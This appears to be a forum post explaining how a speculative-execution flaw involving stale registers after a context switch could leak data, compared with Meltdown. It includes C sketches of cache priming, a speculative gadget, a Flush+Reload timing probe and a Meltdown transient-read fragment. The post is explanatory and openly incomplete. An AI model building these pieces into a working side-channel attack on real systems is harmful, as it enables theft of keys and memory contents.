I think these flaws work approximately like this: Process 1 ensures that memory location X is in the cache (by accessing it), while memory location Y is not in the cache (by accessing enough other locations that location Y gets flushed out); then process 1 yields the processor to other processes.
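A minimal sketch of that priming step in C, with illustrative names and with the eviction buffer simply assumed to be larger than the last-level cache, could look like this:

    #include <stddef.h>
    #include <stdint.h>

    #define LINE  64u
    #define EVICT (64u * 1024u * 1024u)      /* assumed larger than the LLC */

    static volatile uint8_t evict_buf[EVICT];

    /* Bring X into the cache and push Y out by touching many other lines. */
    static void prime(volatile const uint8_t *X)
    {
        volatile uint8_t sink;

        sink = *X;                           /* X is now cached */
        for (size_t i = 0; i < EVICT; i += LINE)
            sink = evict_buf[i];             /* eventually evicts Y */
        (void)sink;
        /* ... then yield the processor, e.g. with sched_yield() ... */
    }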
The scheduler runs process 2 for a while. Eventually, process 1 is scheduled for execution again.
Then, when process 1 gets the processor back, some registers contain data that belong to process 2. If process 1 uses those data in any way, there is a trap, and the registers are loaded with the correct values for process 1 before the instructions accessing these registers finish execution.
However, process 1 now executes a program fragment containing a conditional branch with two paths, one taken and one not taken in the program logic. The processor begins executing instructions from both paths before it knows the result of the test that decides which path to take.
The path not taken extracts a bit 'b' from a register that still contains data belonging to the previous process, and executes a memory fetch from location "if b then X, else Y".
Had this path actually been the one taken in the program logic, touching the stale register would have forced a trap; but the trap is deferred until the processor knows whether it is really needed. Since the path is not taken, the results of the speculative execution are discarded, the registers it touched are automatically restored to the values produced by the architecturally correct path, and no trap is generated. Architecturally the process learns nothing about bit b, or about the contents of memory locations X and Y, and not generating the trap saves a few cycles.
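If I were to sketch the gadget in C, it would have roughly this shape. Here read_stale_xmm0() is a hypothetical placeholder for whatever instruction reads a register still holding the previous process's data, and in practice the branch condition would have to be slow to resolve (or the predictor trained) so that execution actually runs down the wrong path speculatively:

    #include <stdint.h>

    extern volatile const uint8_t *X, *Y;    /* the two primed locations */
    extern uint64_t read_stale_xmm0(void);   /* hypothetical stand-in */

    static void gadget(int condition)        /* architecturally always true */
    {
        volatile uint8_t sink;

        if (condition) {
            sink = 0;                        /* the path actually taken */
        } else {
            /* Never reached architecturally, but may run speculatively
             * while the branch above is unresolved.  Retiring the register
             * read would trap; speculatively it just yields bit b. */
            uint64_t b = read_stale_xmm0() & 1;
            sink = b ? *X : *Y;              /* leaves a footprint in the cache */
        }
        (void)sink;
    }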
However, process 1 can measure how long it took to get past the branching instruction, or, more directly, how long a later access to Y takes. This reveals whether X or Y was fetched, and thereby reveals the value of bit b. That is the leak.
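The measurement of the later access can be made with the time stamp counter, Flush+Reload style; a sketch, where the 100-cycle threshold is only a guess and is in any case machine dependent:

    #include <stdint.h>
    #include <x86intrin.h>

    /* Returns nonzero if *p appears to be cached (i.e. the load was fast). */
    static int probe_is_cached(volatile const uint8_t *p)
    {
        volatile uint8_t sink;
        uint64_t t0, t1;

        _mm_mfence();
        _mm_lfence();
        t0 = __rdtsc();
        _mm_lfence();
        sink = *p;
        _mm_lfence();
        t1 = __rdtsc();
        (void)sink;

        return (t1 - t0) < 100;              /* threshold is machine dependent */
    }

    /* If Y now probes as cached, the speculative path fetched Y, so b was 0;
     * if only X is cached, b was 1. */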
In the Meltdown bug, the exploit could load bit "b" from a memory location that was not part of the process's own address space but belonged to kernel memory or to some other process, and the exploit could control which memory location to draw the bit from. Since many operating systems map all of physical memory into the kernel address space, the exploit could systematically retrieve every bit of physical memory.
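For comparison, the published Meltdown exploits read a whole byte at a time rather than a single bit, by encoding the byte in which page of a probe array gets cached; very roughly, and with the fault suppression (a SIGSEGV handler or TSX) omitted:

    #include <stdint.h>

    #define PAGE 4096
    extern volatile uint8_t probe_array[256 * PAGE];   /* flushed beforehand */

    static void transient_read(const volatile uint8_t *kernel_addr)
    {
        volatile uint8_t sink;

        /* This load faults architecturally, but on affected processors its
         * value can be forwarded to the dependent load below before the
         * fault is delivered. */
        uint8_t secret = *kernel_addr;
        sink = probe_array[secret * PAGE];   /* encodes the byte in the cache */
        (void)sink;
    }

    /* Afterwards, timing probe_array[i * PAGE] for each i (with a probe like
     * the one above) reveals the value of the secret byte. */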
To exploit the present bug, the exploit would probably have to engage a victim program, e.g. a web server running on the same processor, by creating network connections. It would have to do so repeatedly and hope that a context switch happens while the web server is doing cryptographic operations. I don't know whether there is any reliable way to control this with enough precision to actually collect bits of a secret key. How can the attacker know what the contents of the registers really are at the time of the context switch? The attacker would perhaps only get a single bit from each authentication attempt, and if each authentication attempt uses a different nonce, many of the register values will be uncorrelated from one attempt to the next. But of course, a register could also hold a portion of the secret key itself, and with access to the relevant libraries an attacker may be able to determine at what point the secret key is loaded into which registers. Since I have no experience creating exploits, I have no idea whether it is possible to force a context switch in a different process at exactly the opportune moment. If it is, then collecting more and more information about the secret key is probably just a matter of patience.